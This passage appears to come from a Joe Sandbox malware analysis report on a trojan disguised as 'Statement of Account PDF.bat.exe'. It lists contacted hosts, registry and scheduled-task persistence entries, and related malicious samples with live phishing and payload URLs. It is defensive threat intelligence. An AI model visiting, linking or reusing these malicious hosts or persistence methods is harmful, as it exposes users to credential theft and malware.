                                      unknown
                                      http://www.fontbureau.com/designersStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.goodfont.co.krStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.ipify.org/tgDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.carterandcone.comlStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://r3.i.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 
00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cTheStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.ipify.orgStatement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://mail.fascia-arch.comStatement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003227000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002A42000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 
0000001E.00000002.4081952252.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002ADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-user.htmlStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 
00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://x1.i.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 
00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://r3.o.lencr.org0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 
00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/DPleaseStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fonts.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.krStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.urwpp.deDPleaseStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
http://www.zhongyicts.com.cn | Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Statement of Account PDF.bat.exe, 00000000.00000002.1699276440.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000A.00000002.1763034515.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.sakkal.com | Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
50.87.195.61 | mail.fascia-arch.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1432040
                                                      Start date and time:2024-04-26 10:32:05 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 12m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:34
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Statement of Account PDF.bat.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@36/32@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 462
                                                      • Number of non-executed functions: 30
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
09:32:57 | Task Scheduler | Run new task: gDdsxauPhk path: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
09:32:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
09:33:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
10:32:52 | API Interceptor | 5944805x Sleep call for process: Statement of Account PDF.bat.exe modified
10:32:56 | API Interceptor | 31x Sleep call for process: powershell.exe modified
10:33:00 | API Interceptor | 1374237x Sleep call for process: gDdsxauPhk.exe modified
10:33:09 | API Interceptor | 4809222x Sleep call for process: BjTxJte.exe modified
10:33:14 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Sonic-Glyder.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/
104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/
50.87.195.61 | vbc.exe | malicious | FormBook | www.vegrebel.com/nnmd/?VRNp=wBZl4vkh1&MvdD=iedGY0/hYfrjbbwxufAPjCijJp09b4Pnd9RoleXu3W9ZUfsJsAn0SGbENHPecaFD81L2
50.87.195.61 | SWIFT COPY_PDF.exe | malicious | FormBook | www.smguidetowkw.com/m2be/?Et5pFP9=GRobwBHqsz/I/K6QMyhqlyyiibK6nxcxU5TpJro9yIpA+ftqAp39OLT0oN0WcJ2Wu53Xy7WDvg==&uDKLJ=D48t
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.fascia-arch.com | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 50.87.195.61
mail.fascia-arch.com | DHL STATEMENT OF ACCOUNT - 1003657363.exe | malicious | AgentTesla | 50.87.195.61
mail.fascia-arch.com | PO.exe | malicious | AgentTesla | 50.87.195.61
mail.fascia-arch.com | IOJMZilMeH.exe | malicious | AgentTesla | 50.87.195.61
mail.fascia-arch.com | PO#7A68D20.exe | malicious | AgentTesla | 50.87.195.61
api.ipify.org | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Payment.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | Payment Swift.doc | malicious | AgentTesla | 172.67.74.152
api.ipify.org | https://lide.alosalca.fun/highbox#joeblow@xyz.com | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | http://asana.wf | malicious | Unknown | 172.67.74.152
api.ipify.org | o3KyzpE7F4.ps1 | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | http://wsj.pm | malicious | NetSupport RAT | 104.26.12.205
api.ipify.org | 16770075581.zip | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://powerpointmicrosoftoffice.top/ | malicious | Unknown | 104.17.3.184
CLOUDFLARENETUS | https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:d35aec95-f365-414c-8371-68e6d7d2ec41 | malicious | Unknown | 104.17.28.92
CLOUDFLARENETUS | 150-425-2024.exe | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | Payment.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm | malicious | HTMLPhisher | 172.67.144.70
CLOUDFLARENETUS | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
CLOUDFLARENETUS | http://householdshop.club/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://xred.site50.net/syn/SSLLibrary.dll | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | http://tracking.theimpco.com/tracking/click?d=OrpweRVshItmHO3qVpYwg0JJ3qp4iuwmt5687ge2H9uFpmeuDd2X4dPYczAnrgigX6DFu-Km6YtBvUpjEWnC0qAPektAg_1gGuxaDYDl5nf8rOcHvuOtOBIWknNeVHzB3g2 | malicious | Unknown | 1.1.1.1
UNIFIEDLAYER-AS-1US | Quotation Order.exe | malicious | AgentTesla | 192.254.225.166
UNIFIEDLAYER-AS-1US | DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe | malicious | AgentTesla, PureLog Stealer | 50.87.253.239
UNIFIEDLAYER-AS-1US | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 192.254.225.136
UNIFIEDLAYER-AS-1US | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 50.87.195.61
UNIFIEDLAYER-AS-1US | INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | malicious | FormBook, PureLog Stealer | 162.240.81.18
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1 | malicious | Unknown | 192.185.214.24
UNIFIEDLAYER-AS-1US | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | malicious | HTMLPhisher | 162.241.120.242
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | Payment.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | PO-inv-CQV20(92315).exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | a.cmd | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | http://papajoeschicago.com | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1 | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | o3KyzpE7F4.ps1 | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | malicious | HTMLPhisher | 104.26.12.205
                                                      No context
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2837376433510128
                                                      Encrypted:false
